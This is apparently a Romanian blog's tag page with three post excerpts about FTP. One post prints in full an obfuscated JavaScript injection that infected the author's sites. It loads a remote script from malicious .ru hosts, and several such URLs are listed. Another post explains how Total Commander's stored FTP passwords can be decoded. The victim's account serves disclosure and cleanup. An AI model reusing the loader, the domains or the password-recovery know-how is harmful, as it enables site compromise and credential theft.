3 articole care contin FTP

NOTA: Pe aceasta pagina vei gasi doar un fragment din articol, fara imagini, pentru articolul complet click pe titlu. (Ordonarea e dupa data)

Internet 29 Dec 2009, 15:02

Total Commander 7.50 stocheaza mai sigur parolele ftp

Speriat de injectionul de care “am avut parte” saptamanile trecute, aseara mi-am updatat Total Commander-ul. Spre rusinea mea, aveam versiunea 6.5 (lansata in 2005)… De asta data sunt decis sa-mi si cumpar o licenta, nu costa decat 26 de euro. Pentru studenti ar fi 19.5 euro.

Cea mai importanta schimbare in 7.5 (pentru mine) e protejarea parolelor ftp:

TC 7.50 Protects the stored ftp passwords with a master password using AES256 encryption

Stocarea lor intr-un fisier neprotejat intr-un format necriptat (ok, protejata printr-un algoritm de “bramburire”, algoritm cunoscut de altfel) s-a dovedit fatala pentru multi, a existat saptamanile trecute un exploit frumusel.

Culmea e ca versiunea 7.50 finala a Total Commander a fost lansata in septembrie si exploitul bazat pe parolele necriptate din Total Commander (si Filezilla) a aparut in decembrie

Deci UPDATE, UPDATE, UPDATE!

(4 comentarii)

Blogging 12 Dec 2009, 6:29

Cum am scapat de injectionul javascript <script>/*GNU GPL*/ try{window.onload

Am reusit sa-mi umplu blogul si multe alte alte siteuri cu nenorocirea de mai jos

<script>/*GNU GPL*/ 
try{window.onload = function(){var V9vs0ipwfom 
= document.createElement('script');
V9vs0ipwfom.setAttribute('type', 'text/javascript');
V9vs0ipwfom.setAttribute('id', 'myscript1');
V9vs0ipwfom.setAttribute('src',  'h#&amp;t$^&amp;t#&amp;!^&amp;p$#!#:^/$!!/!&amp;#g))a#(m&amp;!@e!r@)-#)@c&amp;^$o#&amp;
(m@^-&amp;^#(t#@#(w^.^w$$r^)!z(&amp;#u&amp;t&amp;()a)(.&amp;#!p@@$&amp;l!!).)@p)#$l$&amp;a^(y)^@^-(c)^^o^!@@m&amp;!(#.)b&amp;#)(r))(o!
(w!!#n!#b&amp;&amp;a&amp;&amp;(@g#^b$&amp;&amp;a#&amp;r@@#.$#&amp;
(r(u(:$^#8#)0($8!0!&amp;&amp;/((&amp;g)o((&amp;(o@#(g()(l@e!@).^)c^!)@^o^#)m^&amp;!
/&amp;)@g#)$!o(o##&amp;g)l#)!e!&amp;@).^(c!(o(!$m^)^/!@&amp;w!@o(^!r(@!(d@#$p!$r$#
(!&amp;e)s$^s(!.$o#@(r@g^@!/@!#h@p@^.$c@^o&amp;()m^@)/$#)^s$u)r)v!e)@$y$$m&amp;!!o)
(@$n!@k&amp;#@e$(#&amp;$y!#^$.!#c#&amp;o&amp;m!(/&amp;&amp;'
.replace(/@|&amp;|\)|\^|#|\(|\$|\!/ig, ''));
V9vs0ipwfom.setAttribute('defer', 'defer');
document.body.appendChild(V9vs0ipwfom);}} 
catch(e) {}</script>

Cod care rula scriptul de la adrresa http://gamer-com-tw.wrzuta.pl.play-com.brownbagbar.ru:8080/google.com/google.com/wordpress.org/hp.com/surveymonkey.com/

Cautand pe google am descoperit ca exista mai multe adrese de unde isi lua cod:

  • http://live.com.google.com.baidu-msn.com.bestartsale.ru:8080/wordpress.com/google-mail.it/livejasmin-photobucket.com/cnet-cnn.com/about-ebay.com/
  • http://google-cn.msn.ca.shoplocal-com.easymusicstore.ru:8080/interia.pl/interia.pl/google.com/empflix.com/debonairblog.com/
  • http://xtube-com.blogger.com.pornorama-com.bluejackmusic.ru:8080/hdfcbank.com/hdfcbank.com/google.com/fanpop.com/in.com/

AVG si Kaspersky nu au gasit nimic neinregula pe calculator, nici macar nu au observat infectarea, dar din fericire Malwarebytes Anti-Malware si-a facut treaba: mai mult →

(45 comentarii)

Internet 28 Apr 2009, 18:37

Un utilitar pentru decodarea parolelor de FTP din Total Commander

In Total Commander datele si parolele de FTP sunt memorate in fisierul wcx_ftp.ini aflat in folderul de instalare al Total Commander-ului sub forma:

[nume conexiune]
host=site.ro
username=sitero
password=659254D492679E2C8DF6
pasvmode=1

Daca e musai sa te conectezi la ftp prin alta aplicatie si nu ai notata o parola se numeste ca ai deja o problema: vezi toate datele de conectare la FTP in fisierul respectiv, dar parola nu este memorata in clar de Total Commander si nici nu poate fi vazuta niciunde – e stocata printr-un algoritm de bramurire, criptarea prin definitie e ireversibila, deci nu puteau fi criptate cu adevarat.

Partea buna e ca… mai mult →

(11 comentarii)

Vezi si cautarea: FTP

Blogroll

Arhive

Pagini

Feed partial | Feed complet
16 vizitatori online